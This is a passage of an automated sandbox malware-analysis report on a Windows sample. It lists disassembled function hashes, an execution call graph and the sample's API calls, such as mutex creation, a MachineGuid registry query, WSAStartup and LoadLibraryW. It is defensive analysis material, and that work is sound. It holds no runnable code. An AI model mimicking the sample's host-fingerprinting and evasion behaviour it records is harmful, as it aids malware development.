                                                • Instruction Fuzzy Hash: 4D1120B6D002198FDB10CFAAD949BDEFBF4EF48324F14846AD419A7210C378A585CFA5
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0722F612 Relevance: 1.6, APIs: 1, Instructions: 52threadCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.1768979558.0000000007220000.00000040.00000800.00020000.00000000.sdmp, Offset: 07220000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_7220000_mPvIOxEZXJsdYp.jbxd
                                                Similarity
                                                • API ID: ResumeThread
                                                • String ID:
                                                • API String ID: 947044025-0
                                                • Opcode ID: fa67fdd2c52bbc933831047f6abc4e71b8911875b9a37022b7425e6a55595049
                                                • Instruction ID: 67d6c9e3b4708a034e88389bc3ce55afc5502488210ca33f5a503db29348b562
                                                • Opcode Fuzzy Hash: fa67fdd2c52bbc933831047f6abc4e71b8911875b9a37022b7425e6a55595049
                                                • Instruction Fuzzy Hash: BD1188B1C003588FCB20DFAAC4447EEFBF4EB89324F20842DC459A7250CB35A545CBA9
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0722F618 Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.1768979558.0000000007220000.00000040.00000800.00020000.00000000.sdmp, Offset: 07220000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_7220000_mPvIOxEZXJsdYp.jbxd
                                                Similarity
                                                • API ID: ResumeThread
                                                • String ID:
                                                • API String ID: 947044025-0
                                                • Opcode ID: 4a2d6a5e7944e66048fc8db9fabbc41754c5f873edc102f398a7d8c4689a8821
                                                • Instruction ID: cef9c55c848d1113e60eb5574fb1cf4d7cc9a770adc948ab7d7cdbc96940f3e4
                                                • Opcode Fuzzy Hash: 4a2d6a5e7944e66048fc8db9fabbc41754c5f873edc102f398a7d8c4689a8821
                                                • Instruction Fuzzy Hash: 5E1166B1D003598FCB20DFAAC4457EEFBF4EB88324F208429C419A7250CB34A945CFA9
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 02B9AED8 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                Download Yara Rule
                                                APIs
                                                • GetModuleHandleW.KERNELBASE(00000000), ref: 02B9AF3E
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.1763734293.0000000002B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B90000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_2b90000_mPvIOxEZXJsdYp.jbxd
                                                Similarity
                                                • API ID: HandleModule
                                                • String ID:
                                                • API String ID: 4139908857-0
                                                • Opcode ID: 40da8252bdbbb44f522e3ea04c41bc0163b9c800075aba4869612e0840c256fe
                                                • Instruction ID: 610894e4472a458c2c42a7e93873e37dbb29557074b2aa2762d9cc1753bab4d3
                                                • Opcode Fuzzy Hash: 40da8252bdbbb44f522e3ea04c41bc0163b9c800075aba4869612e0840c256fe
                                                • Instruction Fuzzy Hash: 1611E0B6D002498FDB10DF9AD444BDEFBF4EB88324F10846AD859A7610C379A545CFA5
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0113D3D8 Relevance: .1, Instructions: 75COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.1761667197.000000000113D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0113D000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_113d000_mPvIOxEZXJsdYp.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 1f6295089ed670c4837341112cb36faeecc456a53124876920921a2c80d8dc24
                                                • Instruction ID: 45cd7921d896b623025ef4432728ae002bdda3dfd8014e079aedabf4c28b1ce4
                                                • Opcode Fuzzy Hash: 1f6295089ed670c4837341112cb36faeecc456a53124876920921a2c80d8dc24
                                                • Instruction Fuzzy Hash: 8D2145B1104200DFDF09DF58E9C0B66BF65FBC8324F60C169E9090B65AC336E456CBA2
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0114D1D4 Relevance: .1, Instructions: 72COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.1761742784.000000000114D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0114D000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_114d000_mPvIOxEZXJsdYp.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 3a15aa97ddb108024018e5074f7fda87b2391852c29799628768a2f8919f5142
                                                • Instruction ID: 8f0a2aa0c1b6d4f6d174adeebb1255bf08b63631e4514a7475ea73b8136a850b
                                                • Opcode Fuzzy Hash: 3a15aa97ddb108024018e5074f7fda87b2391852c29799628768a2f8919f5142
                                                • Instruction Fuzzy Hash: D1212671604200EFDF09DF98E9C4F26BBA5FB94B24F20C66DE9094B356C336D446CA62
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0114D01C Relevance: .1, Instructions: 72COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.1761742784.000000000114D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0114D000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_114d000_mPvIOxEZXJsdYp.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: c3960eb2be26654d5f9e1358f2440c8148cd1ea90cba48a41692507475637813
                                                • Instruction ID: c37788a01cc7751d2f6273b454a60d68bca90301cac5c00b2fbcdbf0823910c4
                                                • Opcode Fuzzy Hash: c3960eb2be26654d5f9e1358f2440c8148cd1ea90cba48a41692507475637813
                                                • Instruction Fuzzy Hash: D7212271604200DFCF19DF98E984B26BFA5EB94B14F20C5ADD80A4B256C33AD447CA62
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0114D006 Relevance: .1, Instructions: 63COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.1761742784.000000000114D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0114D000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_114d000_mPvIOxEZXJsdYp.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 17b4918c435dcbe34b85352626e34210730f554533ff580960d0ffbd01f16abc
                                                • Instruction ID: cddce4609e38f615e84248b48a1170e9eae514333594512efa133c72df558454
                                                • Opcode Fuzzy Hash: 17b4918c435dcbe34b85352626e34210730f554533ff580960d0ffbd01f16abc
                                                • Instruction Fuzzy Hash: 5E219F755083809FCF07CF64D994B11BF71EB56614F28C5EAD8498F2A7C33A980ACB62
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0113D3D3 Relevance: .1, Instructions: 56COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.1761667197.000000000113D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0113D000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_113d000_mPvIOxEZXJsdYp.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
                                                • Instruction ID: 779636b25eedabb9a129c7d3ec7dc5b681163137825e759a617225757f19b61a
                                                • Opcode Fuzzy Hash: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
                                                • Instruction Fuzzy Hash: 4E11DF72404240CFDF06CF54E5C4B56BF71FB94324F24C2A9D9090B65AC33AE45ACBA2
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0114D1CF Relevance: .1, Instructions: 53COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.1761742784.000000000114D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0114D000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_114d000_mPvIOxEZXJsdYp.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
                                                • Instruction ID: 3f208e90a7be273a759ef9a79cc79fdeacc0345d95cf9110c26801ea245ad058
                                                • Opcode Fuzzy Hash: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
                                                • Instruction Fuzzy Hash: C911BB75504280DFDF06CF54D5C4B15BFA1FB84624F24C6AAE8494B296C33AD40ACB62
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0113D745 Relevance: .0, Instructions: 45COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.1761667197.000000000113D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0113D000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_113d000_mPvIOxEZXJsdYp.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 157ab1086d77d7ab797c88c0fcba8f26f721560d618b47b6ef8a4d5242b794bc
                                                • Instruction ID: 913044ff572868ba908c140b857c924cef0d6224c3c3946603b198a41ea53bef
                                                • Opcode Fuzzy Hash: 157ab1086d77d7ab797c88c0fcba8f26f721560d618b47b6ef8a4d5242b794bc
                                                • Instruction Fuzzy Hash: E30120310047849AFB1A4FA9DD84767BF98DF81368F48C529ED094B28AC339D441C672
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0113D744 Relevance: .0, Instructions: 36COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.1761667197.000000000113D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0113D000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_113d000_mPvIOxEZXJsdYp.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: b697b7d1da8778517f7155f18331ad524c7729630b73048e58ba3a8bd9bf6947
                                                • Instruction ID: 71a71718aeb67054efef053d5b9d2d40a57017b119eb013cdce4c055a8845929
                                                • Opcode Fuzzy Hash: b697b7d1da8778517f7155f18331ad524c7729630b73048e58ba3a8bd9bf6947
                                                • Instruction Fuzzy Hash: 9CF068714057849EEB158E59DC88B62FF98EB81634F18C45AED084B29AC3799845CBB1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Execution Graph

                                                Execution Coverage:3%
                                                Dynamic/Decrypted Code Coverage:0%
                                                Signature Coverage:1.3%
                                                Total number of Nodes:300
                                                Total number of Limit Nodes:13
                                                execution_graph 8941 408952 8962 40823f 8941->8962 8944 408960 8946 4056bf 2 API calls 8944->8946 8947 40896a 8946->8947 8990 408862 8947->8990 8949 4089c4 8950 413aca 4 API calls 8949->8950 8951 4089d4 8950->8951 8953 405695 2 API calls 8951->8953 8952 408975 8952->8949 8998 4087d6 8952->8998 8955 4089df 8953->8955 8960 402bab 2 API calls 8961 40899d 8960->8961 8961->8949 8961->8960 8963 40824d 8962->8963 8964 40831b 8963->8964 8965 4031e5 3 API calls 8963->8965 8964->8944 8978 4083bb 8964->8978 8966 40826d 8965->8966 8967 4031e5 3 API calls 8966->8967 8968 408289 8967->8968 8969 4031e5 3 API calls 8968->8969 8970 4082a5 8969->8970 8971 4031e5 3 API calls 8970->8971 8972 4082c1 8971->8972 8973 4031e5 3 API calls 8972->8973 8974 4082e2 8973->8974 8975 4031e5 3 API calls 8974->8975 8976 4082ff 8975->8976 8977 4031e5 3 API calls 8976->8977 8977->8964 9026 408363 8978->9026 8981 4084ab 8981->8944 8982 4056bf 2 API calls 8987 4083f4 8982->8987 8983 408492 8984 413aca 4 API calls 8983->8984 8985 4084a0 8984->8985 8986 405695 2 API calls 8985->8986 8986->8981 8987->8983 9029 40815d 8987->9029 9044 40805d 8987->9044 9059 404b8f 8990->9059 8992 40887e 8993 4031e5 3 API calls 8992->8993 8994 40893e 8992->8994 8996 408946 8992->8996 8997 402b7c 2 API calls 8992->8997 8993->8992 9062 404a39 8994->9062 8996->8952 8997->8992 8999 402b7c 2 API calls 8998->8999 9000 4087e7 8999->9000 9001 4031e5 3 API calls 9000->9001 9005 40885a 9000->9005 9002 408802 9001->9002 9006 40884d 9002->9006 9009 408853 9002->9009 9071 408522 9002->9071 9075 4084b4 9002->9075 9003 402bab 2 API calls 9003->9005 9010 408749 9005->9010 9078 4084d4 9006->9078 9009->9003 9011 404b8f 3 API calls 9010->9011 9012 408765 9011->9012 9013 4031e5 3 API calls 9012->9013 9014 408522 3 API calls 9012->9014 9015 4087c7 9012->9015 9017 4087cf 9012->9017 9013->9012 9014->9012 9016 404a39 4 API calls 9015->9016 9016->9017 9018 4085d1 9017->9018 9019 4086c2 9018->9019 9022 4085e9 9018->9022 9019->8961 9021 402bab 2 API calls 9021->9022 9022->9019 9022->9021 9023 4031e5 3 API calls 9022->9023 9084 4089e6 9022->9084 9103 4086c9 9022->9103 9107 4036a3 9022->9107 9023->9022 9027 4031e5 3 API calls 9026->9027 9028 408386 9027->9028 9028->8981 9028->8982 9030 40816f 9029->9030 9031 4081b6 9030->9031 9032 4081fd 9030->9032 9043 4081ef 9030->9043 9034 405872 4 API calls 9031->9034 9033 405872 4 API calls 9032->9033 9035 408213 9033->9035 9036 4081cf 9034->9036 9037 405872 4 API calls 9035->9037 9038 405872 4 API calls 9036->9038 9039 408222 9037->9039 9040 4081df 9038->9040 9041 405872 4 API calls 9039->9041 9042 405872 4 API calls 9040->9042 9041->9043 9042->9043 9043->8987 9045 40808c 9044->9045 9046 4080d2 9045->9046 9047 408119 9045->9047 9058 40810b 9045->9058 9048 405872 4 API calls 9046->9048 9049 405872 4 API calls 9047->9049 9050 4080eb 9048->9050 9051 40812f 9049->9051 9052 405872 4 API calls 9050->9052 9053 405872 4 API calls 9051->9053 9054 4080fb 9052->9054 9055 40813e 9053->9055 9056 405872 4 API calls 9054->9056 9057 405872 4 API calls 9055->9057 9056->9058 9057->9058 9058->8987 9065 404a19 9059->9065 9068 4049ff 9062->9068 9064 404a44 9064->8996 9066 4031e5 3 API calls 9065->9066 9067 404a2c 9066->9067 9067->8992 9069 4031e5 3 API calls 9068->9069 9070 404a12 RegCloseKey 9069->9070 9070->9064 9072 408534 9071->9072 9074 4085af 9072->9074 9081 4084ee 9072->9081 9074->9002 9076 4031e5 3 API calls 9075->9076 9077 4084c7 9076->9077 9077->9002 9079 4031e5 3 API calls 9078->9079 9080 4084e7 9079->9080 9080->9009 9082 4031e5 3 API calls 9081->9082 9083 408501 9082->9083 9083->9074 9085 4031e5 3 API calls 9084->9085 9086 408a06 9085->9086 9087 4031e5 3 API calls 9086->9087 9091 408b21 9086->9091 9090 408a32 9087->9090 9088 408b17 9119 403649 9088->9119 9090->9088 9110 403666 9090->9110 9091->9022 9094 408b0e 9116 40362f 9094->9116 9096 4031e5 3 API calls 9097 408a88 9096->9097 9097->9094 9098 4031e5 3 API calls 9097->9098 9099 408ac4 9098->9099 9100 405b6f 5 API calls 9099->9100 9101 408aff 9100->9101 9101->9094 9113 408508 9101->9113 9104 4086e2 9103->9104 9106 408744 9103->9106 9105 405872 GetProcessHeap HeapAlloc GetProcessHeap HeapFree 9104->9105 9104->9106 9105->9104 9106->9022 9108 4031e5 3 API calls 9107->9108 9109 4036b5 9108->9109 9109->9022 9111 4031e5 3 API calls 9110->9111 9112 403679 9111->9112 9112->9094 9112->9096 9114 4031e5 3 API calls 9113->9114 9115 40851b 9114->9115 9115->9094 9117 4031e5 3 API calls 9116->9117 9118 403642 9117->9118 9118->9088 9120 4031e5 3 API calls 9119->9120 9121 40365c 9120->9121 9121->9091 8099 402c1f 8100 4031e5 3 API calls 8099->8100 8101 402c31 LoadLibraryW 8100->8101 8058 405924 8061 4031e5 8058->8061 8062 4031f3 8061->8062 8063 403236 8061->8063 8062->8063 8065 403208 8062->8065 8072 4030a5 8063->8072 8078 403263 8065->8078 8067 4031e5 3 API calls 8069 403258 8067->8069 8068 40320d 8068->8069 8070 4030a5 3 API calls 8068->8070 8071 403224 8070->8071 8071->8067 8071->8069 8084 402ca4 8072->8084 8074 4030b0 8075 4030b5 8074->8075 8088 4030c4 8074->8088 8075->8071 8079 40326d 8078->8079 8083 4032b7 8079->8083 8097 402b7c GetProcessHeap HeapAlloc 8079->8097 8081 40328c 8082 402b7c 2 API calls 8081->8082 8082->8083 8083->8068 8085 403079 8084->8085 8087 40307c 8085->8087 8092 40317b GetPEB 8085->8092 8087->8074 8089 4030eb 8088->8089 8091 4030c0 8089->8091 8094 402c03 8089->8094 8091->8071 8093 40319b 8092->8093 8093->8087 8095 4031e5 3 API calls 8094->8095 8096 402c15 8095->8096 8096->8091 8098 402b98 8097->8098 8098->8081 8102 4139de 8111 413855 8102->8111 8104 4139f1 8105 413838 GetProcessHeap HeapAlloc GetPEB 8104->8105 8108 4139f7 8105->8108 8106 413866 21 API calls 8107 413a2d 8106->8107 8109 413b81 GetProcessHeap HeapAlloc GetPEB ExitProcess 8107->8109 8108->8106 8110 413a34 8109->8110 8112 4031e5 3 API calls 8111->8112 8113 413864 8112->8113 8113->8113 8057 404df3 WSAStartup 10650 40f980 10663 413c87 10650->10663 10652 40fa19 10653 40fa08 10654 402bab 2 API calls 10653->10654 10654->10652 10655 40f993 10655->10652 10655->10653 10685 4060bd 10655->10685 10660 412093 6 API calls 10661 40f9f6 10660->10661 10662 412093 6 API calls 10661->10662 10662->10653 10703 413d97 10663->10703 10666 404056 5 API calls 10668 413cad 10666->10668 10667 413c9f 10667->10655 10668->10667 10669 405b6f 5 API calls 10668->10669 10671 413d10 10669->10671 10670 413d7b 10674 402bab 2 API calls 10670->10674 10671->10670 10672 403c62 3 API calls 10671->10672 10673 413d1f 10672->10673 10673->10670 10675 413d5a 10673->10675 10676 413d2c 10673->10676 10674->10667 10678 405b6f 5 API calls 10675->10678 10677 405dc5 3 API calls 10676->10677 10679 413d33 10677->10679 10680 413d55 10678->10680 10679->10680 10682 405b6f 5 API calls 10679->10682 10681 402bab 2 API calls 10680->10681 10681->10670 10683 413d48 10682->10683 10684 402bab 2 API calls 10683->10684 10684->10680 10686 4031e5 3 API calls 10685->10686 10687 4060dd 10686->10687 10688 406126 10687->10688 10689 4031e5 3 API calls 10687->10689 10688->10653 10692 40650a 10688->10692 10690 40610f 10689->10690 10766 40604f 10690->10766 10693 4060ac 3 API calls 10692->10693 10694 406519 10693->10694 10695 4031e5 3 API calls 10694->10695 10696 406529 10695->10696 10697 406599 10696->10697 10698 4031e5 3 API calls 10696->10698 10697->10660 10699 406544 10698->10699 10700 40657f 10699->10700 10702 4031e5 3 API calls 10699->10702 10701 403c40 3 API calls 10700->10701 10701->10697 10702->10700 10704 413da0 10703->10704 10707 413c96 10703->10707 10709 4065a2 10704->10709 10707->10666 10707->10667 10708 405dc5 3 API calls 10708->10707 10724 404a52 10709->10724 10711 406638 10711->10707 10711->10708 10712 4065c0 10712->10711 10736 40393f 10712->10736 10715 406631 10716 402bab 2 API calls 10715->10716 10716->10711 10717 4059d8 3 API calls 10718 4065e9 10717->10718 10720 402b7c 2 API calls 10718->10720 10723 40662a 10718->10723 10719 402bab 2 API calls 10719->10715 10721 4065f8 10720->10721 10722 402bab 2 API calls 10721->10722 10722->10723 10723->10719 10725 402b7c 2 API calls 10724->10725 10727 404a65 10725->10727 10726 404ac6 10726->10712 10727->10726 10728 4031e5 3 API calls 10727->10728 10729 404a8a RegOpenKeyExA 10728->10729 10730 404aa0 10729->10730 10731 404aca 10729->10731 10732 4031e5 3 API calls 10730->10732 10733 402bab 2 API calls 10731->10733 10734 404ab1 RegQueryValueExA 10732->10734 10733->10726 10735 404a39 4 API calls 10734->10735 10735->10726 10743 403843 10736->10743 10739 403969 10739->10715 10739->10717 10741 403961 10742 402bab 2 API calls 10741->10742 10742->10739 10744 403861 10743->10744 10745 402b7c 2 API calls 10744->10745 10747 403875 10745->10747 10746 403923 10746->10739 10762 403aef 10746->10762 10747->10746 10748 4031e5 3 API calls 10747->10748 10749 40389b 10748->10749 10749->10746 10750 4031e5 3 API calls 10749->10750 10751 4038c5 10750->10751 10752 40392a 10751->10752 10754 403666 3 API calls 10751->10754 10753 403649 3 API calls 10752->10753 10753->10746 10755 4038e7 10754->10755 10755->10752 10756 4031e5 3 API calls 10755->10756 10757 403901 10756->10757 10757->10752 10758 403911 10757->10758 10759 40362f 3 API calls 10758->10759 10760 403919 10759->10760 10761 403649 3 API calls 10760->10761 10761->10746 10763 403afc 10762->10763 10764 402b7c 2 API calls 10763->10764 10765 403b16 10764->10765 10765->10741 10767 4031e5 3 API calls 10766->10767 10768 406062 10767->10768 10768->10688

                                                Executed Functions

                                                Function 00413866 Relevance: 4.6, APIs: 3, Instructions: 147synchronizationCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                APIs
                                                • SetErrorMode.KERNELBASE(00000003,00000000,D1E96FCD,00000000,00000000,00000000,00000000), ref: 00413885
                                                • CreateMutexW.KERNELBASE(00000000,00000001,00000000,00000000,CF167DF4,00000000,00000000), ref: 0041399C
                                                • GetLastError.KERNEL32 ref: 0041399E
                                                Memory Dump Source
                                                • Source File: 0000000D.00000002.1741382852.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_13_2_400000_mPvIOxEZXJsdYp.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Error$CreateLastModeMutex
                                                • String ID:
                                                • API String ID: 3448925889-0
                                                • Opcode ID: 24802840a9e80e41c8200fa87372d6a1c573b20100aacb3c492bf68185cebf66
                                                • Instruction ID: 7738172b6d33d5602fc402945caed90a0cea100ae195543e4e9fee3f6653e559
                                                • Opcode Fuzzy Hash: 24802840a9e80e41c8200fa87372d6a1c573b20100aacb3c492bf68185cebf66
                                                • Instruction Fuzzy Hash: 11415E61964348A8EB10ABF1AC82EFFA738EF54755F10641FF504F7291E6794A80836E
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00404A52 Relevance: 3.1, APIs: 2, Instructions: 63registryCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                APIs
                                                  • Part of subcall function 00402B7C: GetProcessHeap.KERNEL32(00000000,?,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E), ref: 00402B85
                                                  • Part of subcall function 00402B7C: HeapAlloc.KERNEL32(00000000,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E,00000000), ref: 00402B8C
                                                • RegOpenKeyExA.KERNELBASE(00000032,?,00000000,00020119,00000000,00000009,F4B4ACDC,00000000,00000000,MachineGuid,00000032,00000000,00413DA5,00413987), ref: 00404A9A
                                                • RegQueryValueExA.KERNELBASE(?,00000000,00000000,00000000,00000000,00000009,00000009,FE9F661A,00000000,00000000), ref: 00404ABC
                                                Memory Dump Source
                                                • Source File: 0000000D.00000002.1741382852.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_13_2_400000_mPvIOxEZXJsdYp.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Heap$AllocOpenProcessQueryValue
                                                • String ID:
                                                • API String ID: 3676486918-0
                                                • Opcode ID: df5e51209e30d87507a4750a0631f6435c2f152f95c8b1de61f5c825813b11bc
                                                • Instruction ID: c751ae4fb1a51baa23b068920df28fa5e45e9ad9ad003da97b765f6d6e9ada80
                                                • Opcode Fuzzy Hash: df5e51209e30d87507a4750a0631f6435c2f152f95c8b1de61f5c825813b11bc
                                                • Instruction Fuzzy Hash: A301B1B264010C7EEB01AED69C86DBF7B2DDB81798B10003EF60475182EAB59E1156B9
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00404DF3 Relevance: 1.5, APIs: 1, Instructions: 13networkCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 82 404df3-404e16 WSAStartup
                                                APIs
                                                • WSAStartup.WS2_32(00000202,?), ref: 00404E08
                                                Memory Dump Source
                                                • Source File: 0000000D.00000002.1741382852.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_13_2_400000_mPvIOxEZXJsdYp.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Startup
                                                • String ID:
                                                • API String ID: 724789610-0
                                                • Opcode ID: aec8cb7098972fa6752499418e154eb0e8b54166df737fc870e0652f0f0fb75e
                                                • Instruction ID: edfb6e6a7b2c2d2c81179f298452045bbfcf768a57aceb16f5d93ae35c4528ea
                                                • Opcode Fuzzy Hash: aec8cb7098972fa6752499418e154eb0e8b54166df737fc870e0652f0f0fb75e
                                                • Instruction Fuzzy Hash: 6EC08C32AA421C9FD750AAB8AD0FAF0B7ACD30AB02F0002B56E1DC60C1E550582906E2
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00402C1F Relevance: 1.5, APIs: 1, Instructions: 12libraryCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 83 402c1f-402c37 call 4031e5 LoadLibraryW
                                                APIs
                                                • LoadLibraryW.KERNELBASE(?,00000000,E811E8D4,00000000,00000000), ref: 00402C34
                                                Memory Dump Source
                                                • Source File: 0000000D.00000002.1741382852.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_13_2_400000_mPvIOxEZXJsdYp.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: LibraryLoad
                                                • String ID:
                                                • API String ID: 1029625771-0
                                                • Opcode ID: 1e00aa432103c00395cacdadc05548eaee9b0074d701dd53c2a9d16b249f06e7
                                                • Instruction ID: cd53f9395925d29cf68d66af6aae64644fca58afce9bbcd5edfe8b9605b00cd0
                                                • Opcode Fuzzy Hash: 1e00aa432103c00395cacdadc05548eaee9b0074d701dd53c2a9d16b249f06e7
                                                • Instruction Fuzzy Hash: C9B092B00082083EAA002EF59C05C7F3A4DDA4410874044397C08E5411F937DE1012A5
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00413A3F Relevance: 1.5, APIs: 1, Instructions: 12COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 86 413a3f-413a57 call 4031e5 ExitProcess
                                                APIs
                                                • ExitProcess.KERNEL32(00000000,00000000,E567384D,00000000,00000000,?,00413B8D,00000000,?,?,004139CC,00000000), ref: 00413A54
                                                Memory Dump Source
                                                • Source File: 0000000D.00000002.1741382852.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_13_2_400000_mPvIOxEZXJsdYp.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: ExitProcess
                                                • String ID:
                                                • API String ID: 621844428-0
                                                • Opcode ID: 28892627b4184eb34835cb905e0569b311a61ada9086cb921d1e57989bacd3e5
                                                • Instruction ID: a51fc36abc950c8e07eb8ba8f8e19e2949325f4e0a3e122df0d5a7568418e784
                                                • Opcode Fuzzy Hash: 28892627b4184eb34835cb905e0569b311a61ada9086cb921d1e57989bacd3e5
                                                • Instruction Fuzzy Hash: 52B092B11042087EAA402EF19C05D3B3A4DCA44508B0044357C08E5422E936EE2050A4
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 004049FF Relevance: 1.5, APIs: 1, Instructions: 11registryCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 89 4049ff-404a18 call 4031e5 RegCloseKey
                                                APIs
                                                • RegCloseKey.KERNELBASE(00000000,00000009,D980E875,00000000,00000000,?,00404A44,?,?,00404AC6,?), ref: 00404A15
                                                Memory Dump Source
                                                • Source File: 0000000D.00000002.1741382852.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_13_2_400000_mPvIOxEZXJsdYp.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Close
                                                • String ID:
                                                • API String ID: 3535843008-0
                                                • Opcode ID: fd13a4ababa05b6dfa8c376aed1a70cd2f6ce4ef8af563d78b915090b99271a8
                                                • Instruction ID: 75bcc15c4d71fff8019d16f1d9debb39272117f3de5fdcc107556e34aff8dcac
                                                • Opcode Fuzzy Hash: fd13a4ababa05b6dfa8c376aed1a70cd2f6ce4ef8af563d78b915090b99271a8
                                                • Instruction Fuzzy Hash: 7CC092312843087AEA102AE2EC0BF093E0D9B41F98F500025B61C3C1D2E9E3E6100099
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Non-executed Functions

                                                Function 0040434D Relevance: 15.1, APIs: 10, Instructions: 135memorycomCOMMON
                                                Download Yara Rule
                                                APIs
                                                • CoInitialize.OLE32(00000000), ref: 0040438F
